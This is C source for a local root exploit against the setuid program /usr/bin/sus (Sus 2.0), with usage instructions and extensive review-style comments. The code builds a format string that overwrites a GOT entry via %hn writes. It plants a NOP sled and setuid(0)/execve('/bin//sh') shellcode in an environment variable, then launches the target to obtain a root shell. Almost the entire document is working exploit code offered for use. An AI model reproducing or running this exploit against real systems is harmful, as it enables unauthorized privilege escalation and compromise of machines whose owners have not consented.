Sus 2.0. local root exploit

usage:

angel@inj3ct0r:~# gcc inj3ct0r.c -o inj3ct0r

angel@inj3ct0r:~# ./inj3ct0r

./inj3ct0r -o <offset> -g <GOT address of the getspnam() entry in /usr/bin/sus>

 

 

/usr/bin/sus: file format elf32-i386

 

usage: inj3ct0r [options]

 

Options:

-o [offset] -g [GOT]

 

angel@inj3ct0r:~# ./inj3ct0r -o 2000 -g 0x8049608

 

Using: retaddr = 0xbffffe88, GOT = 0x8049608, OFFSET = 2000

 

*/

#include <stdio.h>

#include <stdlib.h>

#include <string.h>

#include <unistd.h>

#include <getopt.h>

 

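/* Setuid target whose GOT entry is overwritten through the format string. */
#define BIN "/usr/bin/sus"

/* Shared 100-byte scratch buffer kept for compatibility with the original
 * layout (the format-string builder may keep its own static storage). */
char buf[100];

/* Reference payload: execve("/bin//sh", {"/bin//sh", NULL}, NULL) via
 * int 0x80 (eax = 0x0b).  It contains NO setuid call, whatever the original
 * label said, and main() does not use it. */
char shallcode[] =
    "\x31\xc0\x50\x68\x2f\x2f\x73\x68"
    "\x68\x2f\x62\x69\x6e\x89\xe3\x50"
    "\x53\x89\xe1\x99\xb0\x0b\xcd\x80";

/* Payload placed in the HACK= environment variable: setuid(0) first
 * (xor eax,eax; xor ebx,ebx; mov al,0x17; int 0x80), then the same
 * execve("/bin//sh") sequence as above.  i386 Linux only; no NUL bytes, so
 * strlen() gives its full length (32). */
char shellcode[] =
    "\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
    "\x31\xc0\x50\x68\x2f\x2f\x73\x68"
    "\x68\x2f\x62\x69\x6e\x89\xe3\x50"
    "\x53\x89\xe1\x99\xb0\x0b\xcd\x80";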

 

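/* Return the stack pointer (i386 %esp) as a long.  main() adds the
 * user-supplied offset to it to guess where the NOP sled in the HACK=
 * environment variable lands inside the target.
 *
 * The original relied on the value being left in %eax with no return
 * statement (undefined behaviour).  The "=a" constraint pins the output to
 * %eax explicitly, so the same instruction assembles on i386 and x86-64 (on
 * the latter only the low 32 bits of %rsp are read, which is all an elf32
 * target needs).  Build with -O0 so the call is not inlined away. */
long getsp(void) {
    unsigned int sp;
    __asm__ volatile("movl %%esp, %0" : "=a"(sp));
    return (long)sp;
}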

 

// format string creator | xCrZx idea.

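/* Build the format string handed to the target as argv[1].
 *
 * Layout: two 4-byte little-endian addresses (GOT+2, then GOT), followed by
 * two "%.<precision>x%<pos>$hn" pairs.  Each %hn stores the number of
 * characters written so far (mod 65536) into the address found at positional
 * argument <pos>, so the pair writes the high 16 bits of RET to GOT+2 and the
 * low 16 bits to GOT.  The smaller half is written first so the second
 * precision is never negative; if the smaller half is below the 8 address
 * bytes already emitted, the first precision wraps through 65536 instead of
 * producing a malformed negative precision.
 *
 * GOT   - address to overwrite (main() passes the GOT entry + 4).
 * RET   - 32-bit value to store there (guessed NOP-sled address).
 * ALIGN - positional index of the first address on the target's stack;
 *         ALIGN+1 must select the second one.
 *
 * Returns a pointer to static storage overwritten by the next call.
 *
 * Limitations inherent to the approach: a zero byte in either address
 * truncates argv[1]; "%.Nx" prints at least N characters, so a stack value
 * with more hex digits than N adds a few extra characters to the count. */
char *fmt_str_creator(long GOT, long RET, int ALIGN) {
    static char fmt[100];
    /* Add 2 on the full address, not on the low byte, so a carry propagates
     * (the original produced a wrong address for GOT ending in 0xfe/0xff). */
    unsigned long addr_hi = (unsigned long)GOT + 2;   /* high half goes here */
    unsigned long addr_lo = (unsigned long)GOT;       /* low half goes here  */
    long high = (RET >> 16) & 0xffff;
    long low = RET & 0xffff;
    long small_val, big_val, first_prec, second_prec;
    int first_pos, second_pos;

    if (high > low) {
        small_val = low;  first_pos = ALIGN + 1;     /* low half -> GOT    */
        big_val = high;   second_pos = ALIGN;        /* high half -> GOT+2 */
    } else {
        small_val = high; first_pos = ALIGN;         /* high half -> GOT+2 */
        big_val = low;    second_pos = ALIGN + 1;    /* low half -> GOT    */
    }

    /* 8 address bytes are already counted when the first %hn fires. */
    first_prec = small_val - 8;
    if (first_prec < 0)
        first_prec += 0x10000;
    second_prec = big_val - small_val;

    snprintf(fmt, sizeof fmt,
             "%c%c%c%c%c%c%c%c%%.%ldx%%%d$hn%%.%ldx%%%d$hn",
             (int)(addr_hi & 0xff), (int)((addr_hi >> 8) & 0xff),
             (int)((addr_hi >> 16) & 0xff), (int)((addr_hi >> 24) & 0xff),
             (int)(addr_lo & 0xff), (int)((addr_lo >> 8) & 0xff),
             (int)((addr_lo >> 16) & 0xff), (int)((addr_lo >> 24) & 0xff),
             first_prec, first_pos, second_prec, second_pos);
    return fmt;
}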

 

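/* Print the invocation summary and terminate the process.  Called for a bare
 * "./inj3ct0r" as well as for bad options; it exits with status 0 in every
 * case, so a caller cannot distinguish a usage error from a normal run by
 * exit status. */
void usage(void) {
    fputs("\nSus 2.0.* local root exploit\n\n"
          "usage: inj3ct0r [options]\n\nOptions:\n-o [offset] -g [GOT]\n\n",
          stdout);
    exit(0);
}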

 

 

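/* Entry point: parse -o <offset> and -g <GOT>, build the HACK= environment
 * payload (NOP sled + shellcode) and the format-string argv[1], then execve()
 * the setuid target.  Does not return on success; returns 1 if an argument is
 * unusable, -g is missing, allocation fails or execve() fails.
 *
 * Fixes over the original: GOT is no longer read uninitialised when -g is
 * absent; the address is parsed with strtoul() instead of sscanf("%x") into
 * a long (a type mismatch); the offset is range-checked via strtol(); the
 * memset used sizeof the wrong buffer; malloc() and execve() are checked. */
int main(int argc, char **argv) {
    long GOT = 0;
    long RET;
    int ALIGN = 2, off = 0, opt;   /* ALIGN: positional index of the first address */
    int have_got = 0;
    char *av[3], *ev[2];
    char *hack, buff[100];
    char *end;
    size_t sc_len = strlen(shellcode);

    if (argc < 4)
        usage();                    /* usage() exits */

    while ((opt = getopt(argc, argv, "o:g:")) != -1) {
        switch (opt) {
        case 'o':
            off = (int)strtol(optarg, &end, 10);
            if (end == optarg || *end != '\0') {
                fprintf(stderr, "bad offset: %s\n", optarg);
                return 1;
            }
            break;
        case 'g':
            /* base 16 accepts both "0x8049608" and "8049608" */
            GOT = (long)strtoul(optarg, &end, 16);
            if (end == optarg || *end != '\0') {
                fprintf(stderr, "bad GOT address: %s\n", optarg);
                return 1;
            }
            have_got = 1;
            break;
        default:
            usage();
        }
    }
    if (!have_got) {
        fprintf(stderr, "-g <GOT> is required\n");
        return 1;
    }

    /* Environment payload "HACK=" + NOP sled + shellcode, shellcode ending at
     * offset 999 and the terminating NUL at 1000 (layout kept from the
     * original). */
    hack = malloc(2000);
    if (hack == NULL) {
        perror("malloc");
        return 1;
    }
    memcpy(hack, "HACK=", 5);
    memset(hack + 5, 0x90, 1000 - 1 - sc_len);
    memcpy(hack + 1000 - sc_len, shellcode, sc_len + 1);

    RET = getsp() + off;
    printf("\nUsing: retaddr = 0x%lx, GOT = 0x%lx, OFFSET = %d\n\n", RET, GOT, off);

    /* NOTE(review): the entry actually patched is GOT+4, not the address
     * given on the command line; presumably the slot following the one the
     * user looked up -- confirm against the target binary. */
    memset(buff, 0, sizeof buff);
    snprintf(buff, sizeof buff, "%s", fmt_str_creator(GOT + 4, RET, ALIGN));

    av[0] = BIN;
    av[1] = buff;
    av[2] = NULL;
    ev[0] = hack;
    ev[1] = NULL;
    execve(av[0], av, ev);

    /* Only reached if execve() failed (target missing, not executable, ...). */
    perror("execve " BIN);
    free(hack);
    return 1;
}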
